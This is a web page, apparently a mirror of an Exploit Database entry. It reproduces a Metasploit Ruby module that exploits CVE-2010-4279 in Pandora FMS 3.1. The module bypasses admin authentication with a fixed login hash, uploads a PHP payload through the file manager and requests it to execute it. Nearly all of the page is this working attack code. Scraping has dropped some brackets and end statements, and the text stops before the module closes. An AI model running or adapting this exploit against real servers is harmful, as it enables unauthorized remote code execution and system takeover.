Pandora FMS 3.1 – Authentication Bypass / Arbitrary File Upload (Metasploit)

Exploit Database
114 阅读

作者： Metasploit

日期： 2015-01-08
类别：
- remote
平台：
- php
来源：https://www.exploit-db.com/exploits/35731/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

def initialize(info={})

super(update_info(info,

'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",

'Description'=> %q{

This module exploits an authentication bypass vulnerability in Pandora v3.1 as

disclosed by Juan Galiana Lara. It also integrates with the built-in pandora

upload which allows a user to upload arbitrary files to the '/images/' directory.

This module was created as an exercise in the Metasploit Mastery Class at Blackhat

that was facilitated by egypt and mubix.

'License'=> MSF_LICENSE,

'Author' =>

[

'Juan Galiana Lara', # Vulnerability discovery

'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module

'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module

'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>',# Metasploit module

'_flood <freshbones[at]gmail.com>',# Metasploit module

'mubix <mubix[at]room362.com>',# Auth bypass and file upload

'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload

'References' =>

[

['CVE', '2010-4279'],

['OSVDB', '69549'],

['BID', '45112']

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets'=>

[

['Automatic Targeting', { 'auto' => true }]

'Privileged' => false,

'DisclosureDate' => "Nov 30 2010",

'DefaultTarget'=> 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),

], self.class)

end

def check

base= target_uri.path

# retrieve software version from login page

begin

res = send_request_cgi({

'method' => 'GET',

'uri'=> normalize_uri(base, 'index.php')

})

if res and res.code == 200

#Tested on v3.1 Build PC100609 and PC100608

if res.body.include?("v3.1 Build PC10060")

return Exploit::CheckCode::Appears

elsif res.body.include?("Pandora")

return Exploit::CheckCode::Detected

end

return Exploit::CheckCode::Safe

rescue ::Rex::ConnectionError

vprint_error("#{peer} - Connection failed")

end

return Exploit::CheckCode::Unknown

end

# upload a payload using the pandora built-in file upload

def upload(base, file, cookies)

data = Rex::MIME::Message.new

data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")

data.add_part("Go", nil, nil, 'form-data; name="go"')

data.add_part("images", nil, nil, 'form-data; name="directory"')

data.add_part("1", nil, nil, 'form-data; name="upload_file"')

data_post = data.to_s

data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

res = send_request_cgi({

'method'=> 'POST',

'uri' => normalize_uri(base, 'index.php'),

'cookie'=> cookies,

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'vars_get' => {

'sec'=> 'gsetup',

'sec2' => 'godmode/setup/file_manager',

'data'=> data_post

})

register_files_for_cleanup(@fname)

return res

end

def exploit

base = target_uri.path

@fname = "#{rand_text_numeric(7)}.php"

cookies = ""

# bypass authentication and get session cookie

res = send_request_cgi({

'method'=> 'GET',

'uri' => normalize_uri(base, 'index.php'),

'vars_get' => {

'loginhash_data'=> '21232f297a57a5a743894a0e4a801fc3',

'loginhash_user' => 'admin',

'loginhash' => '1',

})

# fix if logic

if res and res.code == 200

if res.body.include?("Logout")

cookies = res.get_cookies

print_status("Login Bypass Successful")

print_status("cookie monster = " + cookies)

else

fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")

end

# upload PHP payload to images/[fname]

print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")

php= %Q|<?php #{payload.encoded} ?>|

begin

res = upload(base, php, cookies)

rescue ::Rex::ConnectionError

fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")

end

if res and res.code == 200

print_good("#{peer} - File uploaded successfully")

else

fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")

end

# retrieve and execute PHP payload

print_status("#{peer} - Executing payload (images/#{@fname})")

begin

res = send_request_cgi({

'method' => 'GET',

'uri'=> normalize_uri(base, 'images', "#{@fname}")

}, 1)

rescue ::Rex::ConnectionError

fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")

end